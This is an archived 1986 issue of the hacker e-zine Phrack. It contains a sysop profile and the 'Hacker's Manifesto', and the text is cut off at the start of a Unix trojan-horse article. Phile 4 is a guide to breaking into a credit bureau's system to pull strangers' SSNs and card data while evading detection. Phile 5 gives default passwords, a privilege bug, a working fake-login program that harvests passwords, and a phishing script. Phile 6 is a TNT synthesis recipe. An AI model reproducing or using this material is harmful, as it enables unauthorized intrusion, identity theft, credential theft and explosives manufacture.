home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Phrack / Phrack Issue 07.sit / Phrack Issue 07
Text File  |  1993-02-08  |  95KB  |  1,976 lines

  1.  
  2.  
  3.                                 ==Phrack Inc.==
  4.  
  5.                       Volume One, Issue 7, Phile 1 of 10
  6.  
  7.                               September 25, 1986
  8.  
  9. Welcome to Phrack VII.  I'm glad to be back to be able to create something like
  10. this.  It was rather hard from the hospital.  Anyway, I'd like to take you
  11. aside and talk to those of you who have various misconceptions about Phrack
  12. Inc.  First off, Phrack Inc. isn't written by myself, Knight Lightning, or
  13. Cheap Shades.  We merely collect the philes and distribute them in a group.
  14. The articles within are the sheer responsibility of the author.  If you do not
  15. like the philes, talk to the author, not any of us, unless it says in the phile
  16. that we wrote it, please.
  17.  
  18. Phrack World News is merely a sub-article of Phrack Inc. and it is written by
  19. Knight Lightning.  He is to be addressed for all comments about his
  20. ever-controversial PWN, and we'd appreciate it if you'd not condemn the whole
  21. publication just for a few articles.
  22.  
  23. Anyone can write for Phrack Inc. now.  If you have an article you'd like
  24. published or a story for Phrack World News, get in touch with one of us (Knight
  25. Lightning, Taran King, and Cheap Shades) and as long as it fits the guidelines,
  26. it should make it in.  If you have been one of the many ragging on Phrack Inc.,
  27. please, write a phile and see if you can improve our status with your help.
  28. Thanks for your time.  Later on.
  29.  
  30.                                              Taran King
  31.                                     Sysop of Metal Shop Private
  32.  
  33. Featured in this Phrack Inc.:
  34.  
  35. 1  Intro/Index by Taran King (2175 bytes)
  36. 2  Phrack Pro-Phile of Scan Man by Taran King (7133 bytes)
  37. 3  Hacker's Manifesto by The Mentor (3561 bytes)
  38. 4  Hacking Chilton's Credimatic by Ryche (7758 bytes)
  39. 5  Hacking RSTS Part 1 by The Seker (11701 bytes)
  40. 6  How to Make TNT by The Radical Rocker (2257 bytes)
  41. 7  Trojan Horses in Unix by Shooting Shark (12531 bytes)
  42. 8  Phrack World News VI Part 1 by Knight Lightning (15362 bytes)
  43. 9  Phrack World News VI Part 2 by Knight Lightning (16622 bytes)
  44. 10 Phrack World News VI Part 3 by Knight Lightning (16573 bytes)
  45. _______________________________________________________________________________
  46. 
  47.  
  48.  
  49. =========================================================================
  50.  
  51. =========================================================================
  52.  
  53.                                 ==Phrack Inc.==
  54.  
  55.                       Volume One, Issue 7, Phile 2 of 10
  56.  
  57.                             ==Phrack Pro-Phile IV==
  58.  
  59.                        Written and Created by Taran King
  60.  
  61.                                  June 28, 1986
  62.  
  63. Welcome to Phrack Pro-Phile IV.  Phrack Pro-Phile is created to bring info to
  64. you, the users, about old or highly important/controversial people.  This
  65. month, I bring to you one of the most influential users of our times and of
  66. days of old...
  67.  
  68.                                    Scan Man
  69.                                    ~~~~~~~~
  70.  
  71. Scan Man is the sysop of Pirate 80 (P-80), a telcom enthusiasts' bulletin board
  72. in Charleston, West Virginia (304).
  73. -------------------------------------------------------------------------------
  74. Personal
  75. ~~~~~~~~
  76.              Handle: Scan Man
  77.            Call him: Scan Man
  78.        Past handles: None
  79.       Handle origin: Thought it up while writing a scanning program.
  80.       Date of Birth: 8/30/53
  81. Age at current date: 32 years old
  82.              Height: 6'1
  83.              Weight: About 225 lbs.
  84.           Eye color: Green
  85.          Hair Color: Dark Blond to Light Brown
  86.           Computers: 2 TRS Model I's (one of which the BBS is run on), Tandy
  87.                      Model 1000 (IBM Compatible), a 132 Column Dot Matrix, a
  88.                      132 Column Daisy Wheel, a Model 100 Portable, a TRS Color
  89.                      Computer, and a backup 80 Column Dot Matrix Printer.
  90.   Sysop/Co-Sysop of: Pirate 80 (P-80)
  91.  
  92. -------------------------------------------------------------------------------
  93. Scan Man started out in the BBS world about 7 years ago when he first got his
  94. modem, a 300 Baud Auto-Answer/Auto-Dial Micro-Connection Modem (made by Micro
  95. Peripheral Corp.) with tape input and output.  Pirate 80 went up 4 years ago
  96. this Halloween, which consisted of a TRS Model 1, 3 40 track, single sided,
  97. double density floppies, and a 300 baud modem (which held up until 6 months
  98. ago).
  99.  
  100. At the time of arising, the board was put up for interests in phreaking,
  101. hacking, as well as pirating.  Within the first 6 months to now, Scan Man had
  102. gone through 6 BBS programs, and is quite satisfied with the current one.
  103.  
  104. First, he started with a pirated version of TBBS 1.2, then an upgrade to 1.3,
  105. pirated again (occurred and at the same time a hard drive was added after a
  106. number of disk drive changes and modifications).  Scan Man, through his BBS
  107. (which was in the first 5 all phreak/hack BBS's to ever go up, and is the
  108. oldest phreak board in the country), has met or talked to what he considers
  109. "anybody who is anybody".
  110.  
  111. At 11 years old, he found a few old phones, took them apart, and got them
  112. working, which was when his interest in telecom arose.  He was led into the
  113. phreak world when he became aware that he could phreak (articles he read such
  114. as blue box articles).  At the time, BBS's and personal computers did not exist
  115. at this time.
  116.  
  117. The first board he called that involved phreaking was the old Pirate's Harbor.
  118. An anonymous message posted there had a few alternate long distance service
  119. codes posted.  He was very excited that he had stumbled upon this thrill and he
  120. spent the first year or so calling around finding exactly what everyone was
  121. into and from there forward he started manufacturing various devices with The
  122. Researcher.  They worked together and learned together.
  123.  
  124. Because so much information posted was inaccurate, they did this to make it
  125. accurate and found out what was the real stories.  The more memorable phreak
  126. boards that he was on included Plovernet, (and all pre-Plovernet), L.O.D., AT&T
  127. Phone Center, Pirates of Puget Sound, as well as a few others which he couldn't
  128. remember offhand because it was so long ago.
  129.  
  130. Scan Man's works as a computer consultant (systems analyst).  He checks
  131. security as well as enhancements, improvements, and debugging.  He's been doing
  132. this for about a year now.
  133.  
  134. Scan Man's hack/phreak interests are unknown to his employers.  He has attended
  135. various things including sneaking into a seminar on the DMS-250 Digital
  136. Switching System, and before that, TelePub'86, and he's sneaked into other
  137. various telcom/computer security seminars.  He starts one project at a time and
  138. does things step by step.  He's very concentrated in his projects.
  139.  
  140. Scan Man frowns upon groups and says, "If you're any damn good at all, you're
  141. going to get a reputation whether you like it or not."
  142.  
  143. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  144. Interests: Telecommunications (modeming, phreaking, hacking, satellite
  145.            scanning), white water rafting, snow skiing, dancing (he used to be
  146.            a roller skating dance/disco instructor), and boating.
  147.  
  148. Scan Man's Favorite Things
  149. --------------------------
  150.        Foods: Junk food, or an expensive restaurant once a week or so.
  151.       Movies: He's a movie buff, and goes regularly, by himself even.
  152.      Animals: He's an animal lover.
  153. Pyrotechnics: They manufacture various fireworks as a hobby.
  154.  
  155.  
  156. Most Memorable Experiences
  157. --------------------------
  158. The Newsweek Incident with Richard Sandza.
  159. Last year's New Years' Phreak Party.
  160.  
  161. Some People to Mention
  162. ----------------------
  163. The Researcher (for helping him out in starting out with phreak/hacking.)
  164. The Coco Wizard (helped a lot with the BBS and the hardware on the computer.)
  165. King Blotto, Mr. Gucci, and The Scanner (people he could do without.)
  166. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  167. Scan Man dislikes the bickering and fighting between the phone phreaks of
  168. modern day because they're just fighting to climb the social ladder.  He
  169. dislikes the current phone phreaks because they're not in it to learn, and are
  170. only in it to gain a big reputation.  The old phreaks were those that wanted to
  171. be there because they were a student of the network and had a true desire to
  172. learn.  It's become an ego/power-trip of the modern teenage America.  They're
  173. only in it to impress other people, and write philes just to get the
  174. reputation, rather than to write it for the information in it, and collect them
  175. only to say their collection is sizable.  He feels that credit cards are voodoo
  176. because it seems to be what people and sysops get busted for the most.
  177. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  178. I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming in
  179. the near future.  And now for the regularly taken poll from all interviewees.
  180.  
  181. Of the general population of phreaks you have met, would you consider most
  182. phreaks, if any, to be computer geeks?  90% of the phreaks, yes.  10% or less
  183. are in it to learn.  He respects that small percentage.  Thank you for your
  184. time, Scan Man.
  185.  
  186.                                   Taran King
  187.                           Sysop of Metal Shop Private
  188. _______________________________________________________________________________
  189. 
  190.  
  191.                                ==Phrack Inc.==
  192.  
  193.                     Volume One, Issue 7, Phile 3 of 10
  194.  
  195. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  196. The following was written shortly after my arrest...
  197.  
  198.                        \/\The Conscience of a Hacker/\/
  199.  
  200.                                       by
  201.  
  202.                                +++The Mentor+++
  203.  
  204.                           Written on January 8, 1986
  205. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  206.  
  207.         Another one got caught today, it's all over the papers.  "Teenager
  208. Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
  209.         Damn kids.  They're all alike.
  210.  
  211.         But did you, in your three-piece psychology and 1950's technobrain,
  212. ever take a look behind the eyes of the hacker?  Did you ever wonder what
  213. made him tick, what forces shaped him, what may have molded him?
  214.         I am a hacker, enter my world...
  215.         Mine is a world that begins with school... I'm smarter than most of
  216. the other kids, this crap they teach us bores me...
  217.         Damn underachiever.  They're all alike.
  218.  
  219.         I'm in junior high or high school.  I've listened to teachers explain
  220. for the fifteenth time how to reduce a fraction.  I understand it.  "No, Ms.
  221. Smith, I didn't show my work.  I did it in my head..."
  222.         Damn kid.  Probably copied it.  They're all alike.
  223.  
  224.         I made a discovery today.  I found a computer.  Wait a second, this is
  225. cool.  It does what I want it to.  If it makes a mistake, it's because I
  226. screwed it up.  Not because it doesn't like me...
  227.                 Or feels threatened by me...
  228.                 Or thinks I'm a smart ass...
  229.                 Or doesn't like teaching and shouldn't be here...
  230.         Damn kid.  All he does is play games.  They're all alike.
  231.  
  232.         And then it happened... a door opened to a world... rushing through
  233. the phone line like heroin through an addict's veins, an electronic pulse is
  234. sent out, a refuge from the day-to-day incompetencies is sought... a board is
  235. found.
  236.         "This is it... this is where I belong..."
  237.         I know everyone here... even if I've never met them, never talked to
  238. them, may never hear from them again... I know you all...
  239.         Damn kid.  Tying up the phone line again.  They're all alike...
  240.  
  241.         You bet your ass we're all alike... we've been spoon-fed baby food at
  242. school when we hungered for steak... the bits of meat that you did let slip
  243. through were pre-chewed and tasteless.  We've been dominated by sadists, or
  244. ignored by the apathetic.  The few that had something to teach found us will-
  245. ing pupils, but those few are like drops of water in the desert.
  246.  
  247.         This is our world now... the world of the electron and the switch, the
  248. beauty of the baud.  We make use of a service already existing without paying
  249. for what could be dirt-cheap if it wasn't run by profiteering gluttons, and
  250. you call us criminals.  We explore... and you call us criminals.  We seek
  251. after knowledge... and you call us criminals.  We exist without skin color,
  252. without nationality, without religious bias... and you call us criminals.
  253. You build atomic bombs, you wage wars, you murder, cheat, and lie to us
  254. and try to make us believe it's for our own good, yet we're the criminals.
  255.  
  256.         Yes, I am a criminal.  My crime is that of curiosity.  My crime is
  257. that of judging people by what they say and think, not what they look like.
  258. My crime is that of outsmarting you, something that you will never forgive me
  259. for.
  260.  
  261.         I am a hacker, and this is my manifesto.  You may stop this individual,
  262. but you can't stop us all... after all, we're all alike.
  263.  
  264.                                +++The Mentor+++
  265. _______________________________________________________________________________
  266. 
  267.  
  268.  
  269. =========================================================================
  270.  
  271.                                 ==Phrack Inc.==
  272.  
  273.                       Volume One, Issue 7, Phile 4 of 10
  274.  
  275.   -=:><:=--=:><:=--=:><:=--=:><:=--=:>\|/<:=--=:><:=--=:><:=--=:><:=--=:><:=-
  276.  
  277.                              -=:> Hacking The <:=-
  278.                    -=:> Chilton Corporation Credimatic <:=-
  279.                               -=:] By: Ryche [:=-
  280.  
  281.                       -=:} Written on June 24, 1986 {:=-
  282.  
  283.   -=:><:=--=:><:=--=:><:=--=:><:=--=:>\|/<:=--=:><:=--=:><:=--=:><:=--=:><:=-
  284.  
  285. This is the complete version of Hacking Chilton. There is another one that is
  286. floating around that's not as complete.  If you see it anywhere please ask the
  287. sysop to kill it and put this one in its place.
  288.  
  289. The Chilton Corp. is a major credit firm located on Greenville Ave. in Dallas,
  290. Texas.  This is where a lot of the companies that you apply for credit, check
  291. you and your neighbors credit records. Unlike other credit systems such as TRW
  292. and CBI, this one contains the records for people with good credit and doesn't
  293. wipe out some of the numbers of the cards themselves.  All information is
  294. complete and includes full numbers as well as the bank that issued it, limit,
  295. payments due, payments late, their SSN, current & former address, and also
  296. their current and former employer. All you need to know to access this info is
  297. the full name, and address of your "victim".
  298.  
  299. Now, how to hack the Chilton.  Well, the Chilton system is located in Dallas
  300. and the direct dialup (300/1200) is 214-783-6868.  Be in half duplex and hit
  301. return about 10 times until it starts to echo your returns. There is a command
  302. to connect with E-mail that you can put in before echoing return. By echoing
  303. the return key your signifying that you want the credit system. I wont go into
  304. E-mail since there is nothing of special interest there in the first place. If
  305. you are interested in it, try variations of /x** (x=A,B,C,etc.).  All input is
  306. in upper case mind you. Back to the credit part, once you echo return, you can
  307. type: DTS Ctrl-s if you really need to see the date and time or you can simply
  308. start hacking. By this, I mean:
  309. SIP/4char. Ctrl-s
  310.  
  311. This is the Sign In Password command followed by a 4 character alpha numeric
  312. password, all caps as I said before. You can safely attempt this twice without
  313. anyone knowing your there. After the third failed attempt the company printer
  314. activates itself by printing "Login Attempt Failed". This is not a wise thing
  315. to have printed out while your trying to hack into it since there is always
  316. someone there. If you try twice and fail, hit Ctrl-d, call back, echo, and try
  317. again. You can keep doing this as long as you wish since there is no other
  318. monitoring device than that printer I mentioned before. Since this only
  319. activates when you fail to login correct you can safely say there is little if
  320. no danger of your discovery. I would suggest going through an extender though
  321. since Chilton does have access to tracing equipment.  About the passwords, as
  322. far as I know, there are 3 different classes of them with varying privileges,
  323. these are:
  324.  
  325. 1-User/Employee
  326. 2-Permanent/Secretary
  327. 3-Input Output
  328.  
  329. The first one is just to look and pull credit reports. These passwords go dead
  330. every Sunday night at 11:00pm or so. The new ones are good from Monday to
  331. Sunday night. Even though your pass is good for one week, there are limited
  332. times you can use this. The credit system is only accessible at these times:
  333. Mon-Fri: 8:00am to 11:00pm, Sat: 8:00am to 9:00pm, and Sun: 8:00am to 6:00pm
  334. The second class is the same as the first except that these only change
  335. whenever someone leaves the company. These were originally supposed to be set
  336. up for the secretaries so that if they ever need quick access they could w/o
  337. having to go down to the Credit Dept. every week for a new password.  The
  338. third is one I have never gotten..yet. It has the ability to alter a persons
  339. credit reports for one month. At the first of the month the system updates all
  340. reports and changes your alterations to the credit reports. Doing this though
  341. would warrant going through a diverter since your fucking with someone's life
  342. now. Once you have hacked a pass and it accepts the entry it will display the
  343. warning:
  344.  
  345.     ****WARNING! UNAUTHORIZED ACCESS OF THIS SYSTEM IS A FEDERAL CRIME!****
  346.  
  347. Or something along the same lines. After this you should be left to input
  348. something. This is where you enter either In House Mode, System Mode, or
  349. Reporting Mode. In House Mode will give you the reports for the people living
  350. in Dallas/Fort Worth and surrounding counties. System Mode is good for
  351. surrounding states that include:
  352.  
  353. Massachusets, Illinois, Louisiana, Missouri, Arkansas, New Mexico, Colorado,
  354. Arizona, some of New Jersey, and a few others I cant remember. There are 11
  355. states it covers.
  356.  
  357. Reporting is a mode used for getting transcripts of a persons reports and would
  358. require you to input a companies authorization number. So for this file lets
  359. stick to In House and System. Get your victims stats ready and enter a mode:
  360.  
  361. In House:  I/NH Ctrl-s   (Dallas/Ft. Worth 214)
  362. System:  I/S Ctrl-s   (All other NPA's)
  363.  
  364. After that its time to pull records. Type in:
  365.  
  366. I/N-Last Name/F-First Name/L-Street Name/Z-Zip Code/** Ctrl-s
  367.  
  368. If you don't know his street name, use 'A' and it will go into a global search
  369. routine until it finds name that match or are at least 80% similar to the one
  370. you used. Although the Zip Code is not needed and can be left out, it does
  371. narrow the search field down considerably. Once it finds the name, it will
  372. show you his Name, SSN, Current Address, Employer, and former ones if there
  373. are any. Right after his name you will see a ID number. Sorta like: 100-xxxxx
  374. Write this down as it is your key to getting his reports. After it finishes
  375. listing what it has on him its time to see the full story. Type:
  376.  
  377. N/100-xxxxx/M/D Ctrl-s
  378.  
  379. What it will display now is his whole credit history. When you first pulled
  380. his ID number you might have seen he had two names but with a variance like
  381. middle name or a misspelled address. Pull both of them as they are just an
  382. error in whoever put the reports in. I would suggest capturing this so that
  383. you can refer back to it w/o having to access the system every time.
  384.  
  385. There is another way to get into Chilton through Tymnet but I have no idea of
  386. the address for this and its a waste of time. If you happen to get the name
  387. and address of an employee of the company forget the idea of pulling his
  388. stats, Chilton doesnt allow employee records to be in there. One very good
  389. point made not too long ago is the prospect of going through the phone book
  390. and picking names at random.
  391.  
  392. Although Credit Card numbers are displayed credit card fraud is thwarted by
  393. the small fact that it does not show expiration dates. No company making an
  394. actual inquisition on a person would need that information and to prevent the
  395. fraudulent or misuse of the information they were left out. There is an
  396. interesting note that at one time in the companies history they did have a
  397. small  that signified a drug record. This was taken out as it wasn't
  398. pertinent to the computers purpose and was only there because Borg Warner, the
  399. company that owns Chilton wanted to pry into peoples lives. The computer has a
  400. 10 line rotary, so unless there are 11 people using it at the same time your
  401. chances of getting a busy signal are almost if not next to nil.
  402.  
  403. Disclaimer:
  404.  
  405. The information provided in this file is a tutorial and is provided for the
  406. purpose of teaching others about this system and how it operates. It is not
  407. provided to promote the fraudulent use of credit cards or any other such
  408. action(s) that could be considered illegal or immoral. Myself, and the
  409. editors/publishers/distributors of this newsletter are in no way responsible
  410. for the actions or intentions of the reader(s) of this file.
  411.  
  412.                                <>>>> Ryche <<<<>
  413. _______________________________________________________________________________
  414. 
  415.  
  416.  
  417. =========================================================================
  418.  
  419.                                ==Phrack Inc.==
  420.  
  421.                     Volume One, Issue 7, Phile 5 of 10
  422.  
  423.                     $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  424.                     $                                    $
  425.                     $         PROGRAMMING RSTS/E         $
  426.                     $          File1: Passwords          $
  427.                     $                                    $
  428.                     $           by:  The Seker           $
  429.                     $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  430.                     $     Written  (c)  May 22, 1986     $
  431.                     $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  432.  
  433. PREFACE:
  434. --------
  435.  
  436.      This document is first in a series of ongoing files about using the
  437. RSTS/E operating system.  All the files are based on version 8.0 as it is
  438. almost fully compatible with the previous releases.  If the need arises I have
  439. made sure to note differences between V8.x and V9.x.
  440.    Credit goes to High Evolutionary for urging me to write these files; to
  441. Night Stalker for sharing info; and to all other RSTS hackers that have
  442. contributed in some way or another.
  443.  
  444. HISTORY:
  445. --------
  446.      The RSTS/E (Resource System Time Sharing /Environment) operating system
  447. was developed for the PDP/11 series of minicomputers created by DEC. (Digital
  448. Equipment Corporation)  It was developed with ease of use for the user (and
  449. hacker) in mind.  Because of this, there have been a lot of overlooked errors
  450. leaving the system with quite weak security.  In later versions, especially
  451. the 9.x series password security has been greatly improved and is more secure,
  452. but still has plenty of bugs for us to breach.
  453.  
  454. LOGGING ON:
  455. -----------
  456.      Briefly.. locate a valid number and connect.  Hit c/r (carriage return) a
  457. few times or type:
  458.  HELLO
  459. The system should identify itself displaying to you who owns it, what version
  460. they're running under, the date, and the time.  Then it will prompt for an
  461. account number and a password.
  462.      Accounts are in a PPN (Project Program Number) format.  This is actually
  463. two numbers each between 0 and 254 separated by a comma or a slash.  (eg. 3,45
  464. or 27/248)  Privileged accounts which you should hopefully be striving for all
  465. start with a 1.  So start hacking 1,x accounts.
  466.      Passwords are 1-6 characters long.  They are only alphanumeric so you
  467. don't have to worry about all that other shit being included.  On V9.x systems
  468. passwords may be up to 8 characters if the operator has changed the default
  469. length.  But this rarely ever happens as most ops are too lazy.
  470.      Common passwords are:
  471.  SYSLIB
  472.  SYSGEN
  473.  SYSCON
  474.  SYSMGR
  475.  SYSOPR
  476.  SYSTEM
  477.  OPRATR
  478.  RSTS
  479.  DECNET
  480.  GAMES
  481.  YYYYYY
  482.  XXXXXX
  483.  XYXYXY
  484.  DATA
  485.  RICH
  486.  XXX
  487.  AAA
  488.      Many of those have been rumored to be defaults.  But actually I think the
  489. true default (if there is one!) password is:
  490.  RSTSE
  491.      Also, accounts that have a password of:
  492.  ??????
  493. are only accessible by operators.
  494.      Remember to try names, cars, objects, the name of the company (in
  495. different variations), etc.  Cause most people generally pick passwords that
  496. have some relation to their private life.. Take a little time and guess...
  497.  
  498. YOUR IN!
  499. --------
  500.      Once you have succeeded in hacking out a valid password, whether it be
  501. privileged or not, I suggest you find out who is logged onto the system.  You
  502. can do this simply by typing:
  503.  SY
  504.      This will tell you everyone logged on, what they are doing at the moment,
  505. their job number, whether they are attached or detached, and a hell of a lot of
  506. other crap.  What you are looking for is someone else logged in under the same
  507. account you are.  If you find another user in the same account you hacked, log
  508. off and call back later.  This will prolong the life of your account and
  509. prevent a rise in suspicion by the sysops.  Remember, every system keeps a log
  510. of what you do, and if two people are logged in under the same account many
  511. times the sysops will delete or change the password to that account.
  512.      If everything checks out okay, you're free to do as you please.  To list
  513. the files in your allotted space type:
  514.  DIR
  515. or to see all the files on the system type:
  516.  DIR (*,*)
  517.     NOTE: [ ] may be used in place of ( ) when dealing with files.
  518.      * acts as a wildcard on the RSTS system and can be used in place of
  519. account numbers when searching for specific files.  Speaking of searching for
  520. files; to run a file type:
  521.  RUN filename.filetype
  522. where filename = the file you wish to run, and filetype = the extension.
  523.      Experiment!  Try what you will.  If you ever need help just type:
  524.  HELP
  525.      Read the files contained within help.  They are very detailed and I
  526. guarantee can help you with what ever it is you need done.
  527.      One other thing, a few useful control characters are:
  528.  ^C   Breaks out of whatever your doing
  529.  ^R   Repeats last line typed
  530.  ^X   If ^C doesn't work, this may
  531.  ^O   Use to stop the flow of text without aborting the function in process
  532.  ^T   Tells status and runtime of terminal
  533.  ^U   Deletes line presently being typed in
  534.  ^H   Deletes characters
  535.  ^S   Transmission off
  536.  ^Q   Transmission on
  537.  
  538. GAINING PRIVILEGES:
  539. -------------------
  540.      If you weren't able to hack out a privileged account don't panic.  There
  541. are still a few other ways for you to attain sysop status.  These methods may
  542. not always work, but they are worth a try.
  543.    ]SYSTEM LOG[
  544.      On many RSTS/E systems before V9.0 there is one account dedicated to
  545. keeping the system log; everything you and everyone else does.  I have found
  546. this account many times to be 1,101, 1,2, or 0,1 but you may want to do a
  547. directory find to make sure.  Type:
  548.  DIR (*,*)OPSER.LOG
  549. or if nothing appears from that type:
  550.  DIR (*,*)SYSLOG.*
  551. or
  552.  DIR (*,*)
  553.      Look for a file similar in name to that and mark down the account it
  554. appears in.  Now that you know which account the system log resides in logoff.
  555.  BYE
  556.      Then sign back on using the account in which the file was in.  For
  557. password try one of the following:
  558.  OPSER
  559.  OPSLOG
  560.  LOG
  561.  OPS
  562.  OOPS
  563.  OPRATR
  564.  SYSLOG
  565.  SYSTEM
  566.      These are common passwords to that account.  If none of these work your
  567. out of luck unless you can think of some other password that may be valid.
  568.    ]SYSTEM BUGS[
  569.      When operating systems as complex as RSTS/E are created there will
  570. undoubtedly be a few bugs in the operation or security.  (Sometimes I am not
  571. sure if these are intentional or not.)  These can often be taken advantage of.
  572. One that I know of is RPGDMP.TSK.  To use this type:
  573.  RUN (1,2)RPGDMP
  574.      It will ask for a filename, and an output device.  Give it any filename on
  575. the system (I suggest $MONEY, $REACT, or $ACCT.SYS) and it will be dumped to
  576. the specified device. (db1:, screen, etc).
  577.      Credit for this goes to The Marauder of LOD for finding, exposing and
  578. sharing this bug with all.
  579.      If you find any other bugs similar to this, I would appreciate your
  580. getting in touch with and letting me know.
  581.  
  582. GETTING PASSWORDS:
  583. ------------------
  584.      Now that you've hopefully gotten yourself priv's we can get on with these
  585. files.  Getting many passwords is a safety procedure, kind of like making a
  586. backup copy of a program.  There are a number of ways to get yourself
  587. passwords, the easiest is by using privileges, but we will discuss that in a
  588. later file.  The methods I am going to explain are the decoy and a trick I like
  589. to use, which I call the mail method.
  590.    ]DECOY[
  591.      The decoy, commonly called a Trojan Horse, (which is something completely
  592. different) is a program which emulates login.bac.  When the unsuspecting user
  593. enters his account and password you have your program store it into a file that
  594. you can retrieve later.  Here is a short program I've written that will preform
  595. this task:
  596.  
  597. type NEW and it will prompt for a filename.  Enter something not to obvious.
  598.  
  599.    1 ! RSTSE Decoy
  600.    2 ! Written by The Seker (c) 1986 TOK!
  601.    5 extend
  602.   10 print:print
  603.   20 &"RSTS V8.0-07 TOK Communications Ltd.  Job 7  <Dial-up> KB41
  604.  ";date$(0);"  ";time$(0)
  605.   30 print
  606.   40 &"User: ";
  607.   50 open "KB:" for input as file 1
  608.   60 on error goto 300
  609.   70 input 1,proj%,prog%
  610.   80 z$=sys(chr$(3%))
  611.   90 &"Password: ";
  612.  100 on error goto 300
  613.  110 input 1,pass$
  614.  120 print:z$=sys(chr$(2%))
  615.  130 close 1
  616.  140 open "SYSLIB.BAC" for output as file 2
  617.  150 print 2,proj%
  618.  160 print
  619. 2,prog%
  620.  170 print 2,pass$
  621.  180 close 2
  622.  200 print:print
  623.  210 off$=sys(chr$(14%)+"bye/f"+chr$(13))
  624.  300 if erl=70 then goto 350
  625.  310 if erl=110 then goto 360
  626.  350 &"Invalid entry - try again":z$=sys(chr$(2%)):try=try+1:if try=5 then goto
  627. 200 else resume 30
  628.  360 &"Invalid entry - try again":try=try+1:if try=5 then goto 200 else resume
  629. 90
  630.  999 end
  631.  
  632.      The program as I said emulates login.bac, then logs the person off after a
  633. few tries.  Save this program.  Then run it.  When it starts, just drop the
  634. carrier.  The next person to call within 15 minutes will get your imitation
  635. login.
  636.      If you are working on an older system like V7.0 change line 40 to read:
  637.  40 &" ";
  638.    NOTE: This will not work without modifications on releases after V8.7.  An
  639. improved and updated version of this program will be released as a small file
  640. at a later date.
  641.      Next time you login and you want to recover the file type:
  642.  TYPE SYSLIB.BAC
  643.      It should print out the account and password.  If you set this running
  644. each time you plan on hanging up within a few days you'll have yourself a
  645. handful of valid accounts.
  646.    ]MAIL[
  647.      To run mail type:
  648.  RUN $MAIL
  649.      The mail method is probably used by many hackers and since I like to use
  650. it, I thought I'd tell you what it was.
  651.      When you run the program the utility will tell you exactly how to use
  652. itself.  Assuming you know a little about it anyway we will get on with the
  653. file.  The object is to send mail to another user and try and convince him/her
  654. you are the sysop and are writing him/her to validate their password.  Don't
  655. try this with a priv'd user!  It would result in instant deletion.
  656.      Here's basically what you'd type:
  657.  
  658.    Hello.  We are contacting each of the users and validating their records to
  659. keep our files up to date. If you would cooperate and leave me a response which
  660. includes your full name, account number, and password we would appreciate your
  661. help.
  662.  
  663.                                            John Doe
  664.                                        System's Operator
  665.                                              4,11
  666.  
  667.      As you can see the idea is to con a user into believing you are one of the
  668. system ops.  I would say this method works approximately 70% of the time on
  669. most systems since users often times don't associate with sysops.  Use a
  670. different name if you try this though, as John Doe wouldn't fool anyone.  (Be
  671. creative)  Also the 4,11 is the account you'd like them to leave the response
  672. too.
  673.      You can try a few variations of this if you like.  For example, if the
  674. system you're hacking has a chat program:
  675.  
  676.  RUN $TALK
  677.  
  678. You can just talk live time to them.  Or if you somehow (like trashing) manage
  679. to get a list of all the users and their phone numbers, you can call them up
  680. and bullshit them.
  681.  
  682.    NOTE: This document is intended for informational purposes only.  The author
  683.          is in no way responsible for how it is used.  Sysops are free to
  684.          display this at their will as long as no information within is altered
  685.          and all acknowledgements go to The Seker.
  686. 
  687.  
  688.  
  689.  
  690.                                ==Phrack Inc.==
  691.  
  692.                     Volume One, Issue 7, Phile 6 of 10
  693.  
  694.                   XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX
  695.                   Xx                                   xX
  696.                   Xx         American Dynamite         xX
  697.                   Xx                                   xX
  698.                   Xx           By The Rocker           xX
  699.                   Xx                of                 xX
  700.                   Xx        Metallibashers Inc.        xX
  701.                   Xx                                   xX
  702.                   Xx      for: ==Phrack Inc.==         xX
  703.                   Xx                                   xX
  704.                   XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX
  705.  
  706. Recipe:
  707.  
  708. Mix 170 parts tolulene with 100 parts acid.  The acid made of 2 parts of 70%
  709. nitric and 3 parts of 100% sulfuric.  Mix below 30 degrees. Set this down for
  710. 30 min. and let it separate. Take the mononitrotolulene and mix 100 part of it
  711. with 215 parts of acid. This acid is 1 part pure nitric and 2 parts pure
  712. sulfuric. Keep the temperature at 60- 70 degrees while they are slowly mixed.
  713. Raise temp to 90-100 and stir for 30 min.  The dinitrotoluene is separated and
  714. mix 100 parts of this stuff with 225 parts of 20% oleum which is 100% sulfuric
  715. with 20% extra dissolved sulfur trioxide, and 65 parts nitric acid.  Heat at
  716. 95 degrees for 60 min.  Then at 120 degrees for 90 min.
  717.  
  718. Separate the trinitrotoluene and slosh it around in hot water. Purify the
  719. powder by soaking it in benzyne.
  720.  
  721.                            Presto!  American Dynamite!
  722.  
  723. Thanx to S.A. for the idea!   Thanx to Phrack Inc. for just being a sponsor!
  724.  
  725. Don't forget to call these systems after you obliterate someone's house with
  726. that T.N.T...
  727.                    =======================================
  728.                    Speed Demon Elite..........415/522-3074
  729.                    High Times.................307-362-1736
  730.                    Metalland South............404-576-5166
  731.                    Brainstorm Elite...........612-345-2815
  732.                    Atlantis...................215-844-8836
  733.                    =======================================
  734.  
  735. Metallizing,
  736.     The Rocker/MBI
  737.  
  738.  
  739. =========================================================================
  740.  
  741.  
  742.                                ==Phrack Inc.==
  743.  
  744.                     Volume One, Issue 7, Phile 7 of 10
  745.  
  746. ------------------
  747. UNIX Trojan Horses
  748. ------------------
  749.  
  750. By Shooting Shark of Tiburon Systems / R0DENTZWARE - 6/26/86
  751.  
  752. Introduction
  753. ------------
  754.  
  755.      "UNIX Security" is an oxymoron.  It's an easy system to brute-
